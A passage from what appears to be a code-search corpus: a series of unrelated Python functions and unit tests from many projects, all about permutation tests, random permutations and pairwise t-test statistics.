np.newaxis]).mean(-1)\n return T_obs, p_values, H0", "def permutation_test_trial_wrapper(args):\n # print(\"starting \" + str(mp.current_process()))\n adj_matrix = args[0]\n ass_matrix = args[1]\n size = args[2]\n graph = args[3]\n n_cell_types = args[4]\n # H = permumation_test_trial\n H = permutation_test_trial(adj_matrix, ass_matrix, size, graph, n_cell_types)\n # print(\"ending \" + str(mp.current_process()))\n\n return H", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.permutation((20,), 10), updates=random.updates())\r\n\r\n fn_val0 = fn()\r\n fn_val1 = fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def post_hoc_perm(conditions, n_shuffles, dataframe, method = scipy.stats.ttest_rel, seed = 1010):\n \n np.random.seed(seed)\n\n pairs = [pair for pair in itertools.combinations(conditions, 2)]\n n_pairs = len(pairs)\n\n t = np.floor(n_pairs * 0.25)\n\n obs_cond = {}\n perm_cond = {}\n p_cond = {}\n p_ph = {}\n\n maxT = np.zeros(n_shuffles)\n\n #First loop: Generate permutations\n for n, pair in enumerate(pairs):\n\n if n % t == 0:\n print((n / n_pairs) * 100)\n\n term = pair[0] + '_vs_' + pair[1]\n obs, perm, p = t_perm(dataframe[pair[0]], dataframe[pair[1]], n_shuffles, term)\n obs_cond.update(obs)\n perm_cond.update(perm)\n p_cond.update(p)\n\n\n\n for n in range(0, n_shuffles):\n shuffle = np.array([shuffles[n] for shuffles in perm_cond.values()])\n maxT[n] = shuffle[np.squeeze(np.where(abs(shuffle) == np.max(np.abs(shuffle))))]\n\n p_ph = {cond: sum(abs(maxT) >= abs(obs_cond[cond])) / n_shuffles for cond in obs_cond.keys()}\n \n print('Complete')\n return(obs_cond, perm_cond, maxT, p_ph)", "def test_all_pairs_t_test_few_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (low) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean < Group 2 mean\r\n# The nonparametric p-values were calculated using 5 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00354023978206\t0.0106207193462\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nfoo\tbaz\t-9.79795897113\t0.000304092472232\t0.000912277416695\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nbar\tbaz\t-3.0\t0.0288344428112\t0.0865033284337\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=5, tail_type='low')\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_1_2(self):\r\n input = vector()\r\n p = imatrix()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(5,)).astype(config.floatX)\r\n p_val = numpy.asarray([rng.permutation(5) for i in range(3)\r\n ], dtype='int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # Each row of p contains a permutation to apply to the input vector\r\n out_bis = numpy.asarray([input_val[p_row] for p_row in p_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def test_2_1(self):\r\n input = matrix()\r\n p = ivector()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(3, 5)).astype(config.floatX)\r\n p_val = rng.permutation(5).astype('int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # The same permutation should be applied to every row of the input matrix.\r\n out_bis = numpy.asarray([r[p_val] for r in input_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def apply_permutation(hyper, pol, perm):\n pass", "def test_permutation(perm):\n n_src = len(perm)\n perm_tensor = torch.Tensor(perm)\n source_base = torch.ones(1, n_src, 10)\n sources = torch.arange(n_src).unsqueeze(-1) * source_base\n est_sources = perm_tensor.unsqueeze(-1) * source_base\n\n loss_func = PITLossWrapper(pairwise_mse)\n loss_value, reordered = loss_func(est_sources, sources, return_est=True)\n\n assert loss_value.item() == 0\n assert_allclose(sources, reordered)", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.permutation((20,), 10))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def manual_perm_test(model: 'Fitted sklearn estimator',\n X: 'Pandas df',\n y: 'Pandas series',\n true_score: float,\n n_permutations: int=10000,\n plot: bool=True,\n clf: bool=False) -> 'p-value, null_counts':\n\n scores = [] # Empty list for null distribution scores\n n_perms = range(1, n_permutations, 1) # Range of values to permute\n for n in tqdm(n_perms, desc='Permutation test'): # tqdm for progress bar\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, stratify=y, test_size=0.90, random_state=n\n )\n model.fit(X_train, y_train)\n y_test_perm = np.random.permutation(y_test) # Permuting class labels\n chance_scores = round(model.score(X=X_test, y=y_test_perm), 4)\n scores.append(chance_scores)\n\n # Converting to a pandas dataframe\n perm_scores_df = pd.DataFrame(data=scores, columns=['null_dist'])\n perm_scores_df['null_dist'] *= 100\n null_counts = (\n perm_scores_df # Counts greater than or equal to our test set score\n .loc[(perm_scores_df['null_dist']) >= true_score]\n .count()\n .iloc[0]\n )\n p_value = (null_counts + 1) / (n_permutations + 1)\n p_value = np.round(p_value, decimals=5)\n\n if plot is True: # Plotting a histogram of permutation scores\n plt.figure(figsize=(10, 10))\n sns.distplot(a=perm_scores_df['null_dist'],\n hist=True,\n label='Permutation scores')\n ylim = plt.ylim()\n if clf is False:\n # True classifier score and p-value\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='R2 score %s (pvalue : %s)' %\n (true_score, p_value))\n else:\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='Multimodal AUC score: %s (pvalue = %s)' %\n (true_score, p_value))\n n_classes = np.unique(y).size\n chance = 2 * [100. / n_classes]\n plt.plot(chance,\n ylim,\n '--k',\n linewidth=3,\n label='Null model mean AUC score: %s' % 50.00)\n \n plt.ylim(ylim)\n plt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.38))\n plt.tight_layout()\n\n if clf is False:\n plt.xlabel(xlabel='R2 Scores')\n else:\n plt.xlabel(xlabel='AUC Scores')\n plt.title(label='Null Distribution')\n plt.savefig('quadratic_null_dist.png', dpi=300, bbox_inches='tight')\n plt.show()\n\n return p_value, null_counts", "def test_perm(self):\n fun = get_problem('perm', dimension=2)\n self.assertAlmostEqual(fun(np.array([1.0, 0.5])), 0.0)", "def test_permutation_helper(self):\r\n # permutation_helper needs \"ndim_added=1\", because its output\r\n # is one dimension more than its \"shape\" argument (and there's\r\n # no way to determine that automatically).\r\n # Check the working case, over two calls to see if the random\r\n # state is correctly updated.\r\n rf = RandomFunction(permutation_helper, tensor.imatrix, 8,\r\n ndim_added=1)\r\n rng_R = random_state_type()\r\n post_r, out = rf(rng_R, (7,), 8)\r\n\r\n f = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r, mutable=True)],\r\n [out], accept_inplace=True)\r\n\r\n numpy_rng = numpy.random.RandomState(utt.fetch_seed())\r\n val0 = f()\r\n val1 = f()\r\n # numpy_rng.permutation outputs one vector at a time,\r\n # so we call it iteratively to generate all the samples.\r\n numpy_val0 = numpy.asarray([numpy_rng.permutation(8)\r\n for i in range(7)])\r\n numpy_val1 = numpy.asarray([numpy_rng.permutation(8)\r\n for i in range(7)])\r\n print val0\r\n print numpy_val0\r\n print val1\r\n print numpy_val1\r\n self.assertTrue(numpy.all(val0 == numpy_val0))\r\n self.assertTrue(numpy.all(val1 == numpy_val1))\r\n\r\n # This call lacks \"ndim_added=1\", so ndim_added defaults to 0.\r\n # A ValueError should be raised.\r\n rf0 = RandomFunction(permutation_helper, tensor.imatrix, 8)\r\n post_r0, out0 = rf0(rng_R, (7,), 8)\r\n f0 = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r0, mutable=True)],\r\n [out0], accept_inplace=True)\r\n self.assertRaises(ValueError, f0)\r\n\r\n # Here, ndim_added is 2 instead of 1. A ValueError should be raised.\r\n rf2 = RandomFunction(permutation_helper, tensor.imatrix, 8,\r\n ndim_added=2)\r\n post_r2, out2 = rf2(rng_R, (7,), 8)\r\n f2 = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r2, mutable=True)],\r\n [out2], accept_inplace=True)\r\n self.assertRaises(ValueError, f2)", "def test_permutations(experiment, verbose=False):\n topics = experiment.topics\n no_topics = len(topics) # The total number of topics used for the given experiment.\n no_permutations = experiment.n # The total number of possible permutations.\n\n if verbose:\n print \"Topics: {0} (total of {1})\".format(topics, no_topics)\n print \"Total permutations: {0}\".format(no_permutations)\n print\n\n for i in range(0, no_permutations):\n rotations = experiment.get_rotations(i)\n\n if verbose:\n print \"Permutation {0} ({1})\".format(i, rotations)\n\n for k in range(0, no_topics):\n rotation_topic = experiment.get_rotation_topic(i, k)\n\n if verbose:\n print \"\\tTopic {0} at permutation list position {1}\".format(rotation_topic, k)\n\n if experiment.get_rotations(i)[k] == experiment.get_rotation_topic(i, k):\n if verbose:\n print \"\\t\\tPASS\"\n else:\n if verbose:\n print \"\\t\\tFAIL\"\n return False\n\n if verbose:\n print \"Permutation check PASSED\"\n\n return True", "def test_all_pairs_t_test_no_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\tN/A\tN/A\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\tN/A\tN/A\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=0)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_T0():", "def test_pairwise(self, test_type='t-test'):\n return pair_tests(self.evaluations, test_type, self.diff_var, self.dof)", "def _perform_pairwise_tests(labels, dists, tail_type, num_permutations):\r\n result = []\r\n\r\n # Convert our notion of tail type into the format expected by\r\n # PyCogent.\r\n if tail_type == 'two-sided':\r\n tail_type = None\r\n\r\n # Compare each pair of distributions, keeping track of the number of actual\r\n # tests that were successfully performed so that we can correct for\r\n # multiple comparisons.\r\n num_tests = 0\r\n for g1_idx, (g1_label, g1_dist) in enumerate(zip(labels[:-1], dists[:-1])):\r\n for g2_label, g2_dist in zip(\r\n labels[(g1_idx + 1):], dists[(g1_idx + 1):]):\r\n if ((len(g1_dist) == 1 and len(g2_dist) == 1) or\r\n (len(g1_dist) < 1 or len(g2_dist) < 1)):\r\n # Not enough data to run the test.\r\n obs_t, param_p_val, nonparam_p_val = nan, nan, nan\r\n else:\r\n obs_t, param_p_val, _, nonparam_p_val = mc_t_two_sample(\r\n g1_dist, g2_dist, tails=tail_type,\r\n permutations=num_permutations)\r\n result.append([g1_label, g2_label, obs_t, param_p_val, None,\r\n nonparam_p_val, None])\r\n if obs_t is not nan:\r\n num_tests += 1\r\n\r\n # Correct the p-values for multiple comparisons, now that we know how many\r\n # tests succeeded.\r\n for stat in result:\r\n stat[4] = stat[3] if stat[3] is nan else min(stat[3] * num_tests, 1)\r\n stat[6] = stat[5] if stat[5] is nan else min(stat[5] * num_tests, 1)\r\n return result", "def entropy_permutation_test(ordered_pitch_types, single_pitch_pdf, conditional_joint_probabilities, total_transitions,\n n=1000):\n pitch_types, pitch_probabilities = zip(*single_pitch_pdf.items())\n permutation_entropies = []\n progress = progressbar.ProgressBar()\n\n for test_number in progress(xrange(n)):\n # create the new matrix\n permutation_counts = {}\n for first_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type] = {}\n for second_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type][second_pitch_type] = 0\n\n pitch_permutation = numpy.random.choice(pitch_types, total_transitions, p=pitch_probabilities)\n current_pitch = numpy.random.choice(pitch_types, p=pitch_probabilities)\n for next_pitch in pitch_permutation:\n permutation_counts[current_pitch][next_pitch] += 1\n current_pitch = next_pitch\n\n joint_probabilities, _, _ = joint_probabilities_from_transitions(ordered_pitch_types, permutation_counts)\n permutation_entropies.append(entropy_from_probability_matrix(joint_probabilities))\n\n joint_entropy = entropy_from_probability_matrix(conditional_joint_probabilities)\n # print 'Mean', numpy.mean(permutation_entropies)\n # print 'Standard deviation', numpy.std(permutation_entropies)\n # tdof, tloc, tscale = stats.t.fit(permutation_entropies)\n # print 'DF', tdof, 'Loc (mean)', tloc, 'Scale (SD)', tscale\n # t_score = (joint_entropy - tloc) / tscale\n # print stats.t.cdf(joint_entropy, df=tdof, loc=tloc, scale=tscale)\n\n mean, stddev = stats.norm.fit(permutation_entropies)\n print 'Mean = {mean}\\t StdDev = {stddev}'.format(mean=mean, stddev=stddev)\n z_score = (joint_entropy - mean) / stddev\n p_value = stats.norm.cdf(joint_entropy, mean, stddev)\n print 'The joint entropy has a Z-score of {z_score} which gives a P-value of {p_value}'.format(z_score=z_score,\n p_value=p_value)\n return z_score, p_value", "def test_perform_pairwise_tests_single_comp(self):\r\n # Verified with R's t.test function.\r\n exp = [['foo', 'bar', -6.5999999999999996, 0.0070804795641244006,\r\n 0.0070804795641244006, 0.100000000001, 0.10000000000001]]\r\n np.random.seed(self.value_for_seed)\r\n obs = _perform_pairwise_tests(self.labels1, self.dists1, 'two-sided',\r\n 999)\r\n self.compare_multiple_level_array(obs, exp)", "def test_T3():", "def test_T3():", "def test_permutation(self):\r\n rng_R = random_state_type()\r\n post_r, out = permutation(rng_R, size=(9,), n=6)\r\n print 'OUT NDIM', out.ndim\r\n f = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r, mutable=True)],\r\n [out], accept_inplace=True)\r\n\r\n numpy_rng = numpy.random.RandomState(utt.fetch_seed())\r\n # Check over two calls to see if the random state is correctly updated.\r\n # numpy_rng.permutation outputs one vector at a time,\r\n # so we call it iteratively to generate all the samples.\r\n val0 = f()\r\n val1 = f()\r\n numpy_val0 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n numpy_val1 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n print val0\r\n print numpy_val0\r\n print val1\r\n print numpy_val1\r\n self.assertTrue(numpy.all(val0 == numpy_val0))\r\n self.assertTrue(numpy.all(val1 == numpy_val1))", "def test_distance_matrix_permutation_test_symmetric(self):\r\n def make_result_list(*args, **kwargs):\r\n return (\r\n [distance_matrix_permutation_test(*args)[2] for i in range(10)]\r\n )\r\n\r\n m = array([[0, 1, 3], [1, 2, 4], [3, 4, 5]])\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n n = 100\r\n\r\n # looks at each possible permutation n times --\r\n # compare first row to rest\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n)\r\n self.assertSimilarMeans(r, 0. / 6.)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='high')\r\n self.assertSimilarMeans(r, 0.77281447417149496, 0)\r\n r = make_result_list(m, [(0, 0), (0, 1), (0, 2)], n=n, tails='low')\r\n self.assertSimilarMeans(r, 4. / 6.)\r\n\r\n # The following lines are not part of the test code, but are useful in\r\n # figuring out what t-scores all of the permutations will yield.\r\n # permutes = [[0, 1, 2], [0, 2, 1], [1, 0, 2],\\\r\n # [1, 2, 0], [2, 0, 1], [2, 1, 0]]\r\n #results = []\r\n # for p in permutes:\r\n # p_m = permute_2d(m,p)\r\n # results.append(t_two_sample(\\\r\n # [p_m[0,1],p_m[0,2]],[p_m[2,1]],tails='high'))\r\n # print results\r", "def test_T2():", "def test_T2():", "def _test(self, **kwargs):\n raise ValueError(\"This function is not available in lazy results evaluation as it would \"\n \"require all pairwise tests to be performed.\")", "def _run_permutation(self, params):\n iter_df, iter_xyz = params\n iter_xyz = np.squeeze(iter_xyz)\n iter_df[[\"x\", \"y\", \"z\"]] = iter_xyz\n stat_values = self._compute_summarystat(iter_df)\n return stat_values", "def distribute_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n output: str,\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n procs: int = os.cpu_count(),\r\n single: bool = False,\r\n fdr: bool = False\r\n) -> None:\r\n\r\n client = get_client()\r\n\r\n log._logger.info('Scattering data to workers...')\r\n\r\n ## Scatter data onto workers\r\n [matrix] = client.scatter([matrix], broadcast=True)\r\n [uids] = client.scatter([uids], broadcast=True)\r\n futures = []\r\n\r\n if single:\r\n seeds = [seeds] # type: ignore\r\n\r\n for s in seeds:\r\n\r\n log._logger.info('Running permutation tests...')\r\n\r\n permuted_futures = []\r\n s = client.scatter([s], broadcast=True)\r\n\r\n ## Split the number of permutations evenly\r\n for chunk in np.array_split(np.zeros(permutations), procs):\r\n\r\n prox_vector_future = client.submit(\r\n _run_individual_permutation_tests,\r\n matrix,\r\n s,\r\n uids,\r\n len(chunk),\r\n alpha,\r\n pure=False,\r\n single=single\r\n )\r\n\r\n permuted_futures.append(prox_vector_future)\r\n\r\n futures.append(permuted_futures)\r\n\r\n log._logger.info('Calculating p-values...')\r\n\r\n ## Wait for testing to finish\r\n for i, test in enumerate(futures):\r\n\r\n ## Gather the results of the permutation tests for this specific seed node\r\n test = client.gather(test)\r\n ## Get the first test so we keep the node_from, node_to, and prob. columns and\r\n ## concat the walk scores from the rest.\r\n prox_vector = test.pop(0)\r\n\r\n ## Get rid of node_from, node_to, prob. columns from the rest of the tests and\r\n ## only keep their permuted walk scores\r\n for df in test:\r\n prox_vector = pd.concat([\r\n prox_vector,\r\n df.drop(columns=['node_from', 'node_to', 'probability'])\r\n ], axis=1)\r\n\r\n ## Calculate the p-value\r\n prox_vector = _calculate_p(prox_vector, permutations)\r\n\r\n ## FDR adjusted p-values\r\n if fdr:\r\n prox_vector = _adjust_fdr(prox_vector)\r\n\r\n ## Create a new file if necessary\r\n if i == 0:\r\n _make_ness_header_output(output, p=True, q=fdr)\r\n\r\n ## Save the output\r\n _append_ness_output(output, prox_vector)", "def test_T4():", "def test_T4():", "def test_T1():", "def test_T1():", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations)", "def test_T01():", "def permutation_test_score(self, estimator, y, n_permutations=100):\n\n return nmf_permutation_test_score(estimator, y, n_permutations=n_permutations, verbose=self.verbose)", "def _run_individual_permutation_tests(\r\n matrix: csr_matrix,\r\n seeds: List[types.BioEntity],\r\n uids: Dict[types.BioEntity, int],\r\n permutations: int = 250,\r\n alpha: np.double = 0.15,\r\n single: bool = False\r\n) -> pd.DataFrame:\r\n\r\n ## First get the proximity vector for the walk\r\n prox_vector = _run_individual_walks(matrix, seeds, uids, alpha, single=single)\r\n\r\n ## Start the permutation testing\r\n for i in range(permutations):\r\n\r\n ## Shuffle the node labels\r\n permuted_uids = graph.shuffle_node_labels(uids)\r\n\r\n ## Run the permuted walk\r\n permuted_vector = _run_individual_walks(\r\n matrix, seeds, permuted_uids, alpha, single=single\r\n )\r\n\r\n ## Join on the original results\r\n prox_vector[f'p_{i}'] = permuted_vector.probability\r\n\r\n return prox_vector", "def test_perform_pairwise_tests_multi_comp(self):\r\n # Verified with R's t.test function.\r\n exp = [['foo', 'bar', -6.5999999999999996, 0.0070804795641244006,\r\n 0.021241438692373202, nan, nan], ['foo', 'baz',\r\n -\r\n 9.7979589711327115, 0.00060818494446333643, 0.0018245548333900093,\r\n nan, nan], ['bar', 'baz', -3.0, 0.05766888562243732,\r\n 0.17300665686731195, nan, nan]]\r\n obs = _perform_pairwise_tests(self.labels2, self.dists2, 'two-sided',\r\n 0)\r\n self.compare_multiple_level_array(obs, exp)", "def paired_permutation_test(D1, a, b, tradeoff, threshold=0.05, R=10000, verbose=1):\n\n # extract the scores by example for each system\n A = D1[D1.policy == a]\n B = D1[D1.policy == b]\n assert (A.example == B.example).all()\n assert (A.index == B.index).all()\n\n W = B.want.sum() # number of thing we want is constant among permutations\n n = len(A.index)\n\n AC = np.array(A.want_and_got) * 1.0\n AG = np.array(A.got) * 1.0\n A_runtime = np.array(A.pushes) * 1.0\n\n BC = np.array(B.want_and_got) * 1.0\n BG = np.array(B.got) * 1.0\n B_runtime = np.array(B.pushes) * 1.0\n\n # observed value of test statistic -- the difference of rewards.\n T_observed = test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n np.zeros(n, dtype=np.int32), W, tradeoff)\n\n r = 0.0\n for _ in iterview(range(R), msg='perm test'):\n # randomly generate a vector of zeros and ones (uniformly).\n # Note: endpoint not included in np.random.randit (that's why theres a 2).\n flip = np.random.randint(0, 2, size=n).astype(np.int32)\n if test_statistic(AC, AG, A_runtime,\n BC, BG, B_runtime,\n flip, W, tradeoff) >= T_observed:\n r += 1\n s = (r+1)/(R+1)\n\n # observed rewards\n ra = cgw_f(AC.sum(), AG.sum(), W) - tradeoff*A_runtime.mean()\n rb = cgw_f(BC.sum(), BG.sum(), W) - tradeoff*B_runtime.mean()\n\n if verbose:\n # which system has higher reward? is it significant?\n asig = (red % bold) if ra > rb and s <= 0.05 else '%s'\n bsig = (blue % bold) if rb > ra and s <= 0.05 else '%s'\n any_sig = bold if s <= threshold else yellow\n\n print asig % 'R(A) = %g (%s)' % (ra, a)\n print bsig % 'R(B) = %g (%s)' % (rb, b)\n print any_sig % 'confidence = %g' % (1-s)\n print\n\n if s <= threshold:\n return s, -1 if ra > rb else +1\n else:\n return s, 0 # \"statistical tie\"", "def permutation_is_valid(permutation):\n pass", "def run_paired_t(data_generator):\r\n test_stats, pvals = [], []\r\n for b_data, a_data in data_generator:\r\n test_stat, pval = t_paired(b_data, a_data)\r\n test_stats.append(test_stat)\r\n pvals.append(pval)\r\n return test_stats, pvals", "def par_test_2(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = [\n self.XYZ_factor.mult(self.scalar),\n self.XYZ_factor.mult(self.scalarf),\n self.scalarf.mult(self.XYZ_factor),\n ]\n\n par_res = [\n self.XYZ_par_factor.mult(self.scalar),\n self.XYZ_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XYZ_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )", "def ParallelToserial(self):\n pass", "def permutation_test_mat(matrix,\n n_1, n_2, n_permutations,\n a00=1, a11=1, a01=0):\n n = n_1 + n_2\n pi = np.zeros(n, dtype=np.int8)\n pi[n_1:] = 1\n\n larger = 0.\n count = 0\n \n for sample_n in range(1 + n_permutations):\n count = 0.\n for i in range(n):\n for j in range(i, n):\n mij = matrix[i, j] + matrix[j, i]\n if pi[i] == pi[j] == 0:\n count += a00 * mij\n elif pi[i] == pi[j] == 1:\n count += a11 * mij\n else:\n count += a01 * mij\n if sample_n == 0:\n statistic = count\n elif statistic <= count:\n larger += 1\n\n np.random.shuffle(pi)\n\n return larger / n_permutations", "def test_make_mul_transp():\n tmp_dir = make_temp_dir()\n FILE_NAME = \"tmp_test_mul_transp\"\n NAME = os.path.join(tmp_dir, FILE_NAME)\n C_NAME, EXE_NAME = NAME + \".c\", NAME + \".exe\"\n \n def make_testprogram(lv, lm, n=1):\n generate = BitMatrixMulTransp().generate_c_mul_transp\n f = open(C_NAME, \"wt\")\n print(r\"\"\"#include <stdio.h>\n#include <stdint.h>\nint main(int argc, char **argv)\n{{\n uint_fast32_t i, v;\n static uint_fast32_t a[1000];\n sscanf(argv[1], \"%ld\", &v);\n for (i=0; i < argc-2; ++i) sscanf(argv[i+2], \"%ld\", a+i);\n {0}\n printf(\"%ld\\n\",v);\n return 0;\n}}\n\"\"\".format(generate(\"v\", \"a\", lv, lm, n)), file = f)\n f.close()\n #subprocess.check_output([\"gcc\", C_NAME, \"-o\", EXE_NAME])\n compile_testprogramm([C_NAME], EXE_NAME)\n checker = BitMatrixMulTransp()\n checker.set_matrix(lv, lm, n)\n return checker\n\n def run_testprogram(v, m):\n data = list(map(str, [v]+m)) \n res = subprocess.check_output([EXE_NAME] + data)\n return int(res) \n\n def test_testprogram(checker , v, m):\n res = run_testprogram(v, m)\n ref = checker.compute(v,m+[0]*64)\n assert ref == ref, (hex, ref)\n\n def del_testprogram():\n for f in [C_NAME, EXE_NAME]:\n os.remove(f)\n\n test_data_dict = {\n (4,4,1,0): [ (3, [2,3, 1, 1]) , ]\n }\n\n def test_data(lv, lm, n, n_tests=10):\n \"\"\"yield n_tests test cases (v, m) for given lv, lm, m0\"\"\"\n try:\n d = test_data_dict[(lv, lm, n, m0)]\n for v, m in d: yield v, m\n except:\n pass\n for i in range(n_tests):\n v = random.randint(0, 2**(n*lv)-1)\n m = [] \n for i in range(lm):\n m.append(random.randint(0, 2**(n*lv)-1))\n yield v, m\n\n def test_programs():\n \"\"\"yield cases (lv, lm, n) for a making a test program\"\"\"\n yield 4, 4, 1\n yield 16, 12, 2\n\n \n\n \n for lv, lm, n in test_programs():\n print(\"Make C program for case lv=%d, lm=%d, n=%d\" % (\n lv,lm,n))\n checker = make_testprogram(lv, lm, n) \n print (\"C program has been made, starting tests..\")\n for v, m in test_data(lv, lm, n):\n test_testprogram(checker, v, m)\n del_testprogram()\n print (\"passed\")\n\n kill_temp_dir(tmp_dir)", "def test(self, inputs, reps=1000, workers=-1):\n\n # calculate observed test statistic\n u, v = k_sample_transform(inputs)\n self.u = u\n self.v = v\n obs_stat = self.indep_test._statistic(u, v)\n\n # use all cores to create function that parallelizes over number of reps\n mapwrapper = MapWrapper(workers)\n null_dist = np.array(list(mapwrapper(self._perm_stat, range(reps))))\n self.null_dist = null_dist\n\n # calculate p-value and significant permutation map through list\n pvalue = (null_dist >= obs_stat).sum() / reps\n\n # correct for a p-value of 0. This is because, with bootstrapping\n # permutations, a p-value of 0 is incorrect\n if pvalue == 0:\n pvalue = 1 / reps\n self.pvalue = pvalue\n\n return obs_stat, pvalue", "def test_tdma():\n a = np.array([0,1,1])\n b = np.array([1,1,1])\n c = np.array([2,1,0])\n d = np.array([5,6,5])\n x = tdma(a,b,c,d)\n print \"x= \", x\n a = np.array([0,1,1])\n b = np.array([1,1,1])\n c = np.array([2,1,0])\n d = np.array([5,6,5])\n x2 = tripiv(a, b, c, d)\n print \"x2= \", x2\n \n return x, x2", "def parallel_batch_testing(subject_array, batch_size, typeII_error, typeI_error, parallel_num, ind_repeat, seq):\n\n\n\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array)/batch_size)* parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(subject_array)/batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in (temp_batch[:, 1]):\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n else:\n if random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])\n\n 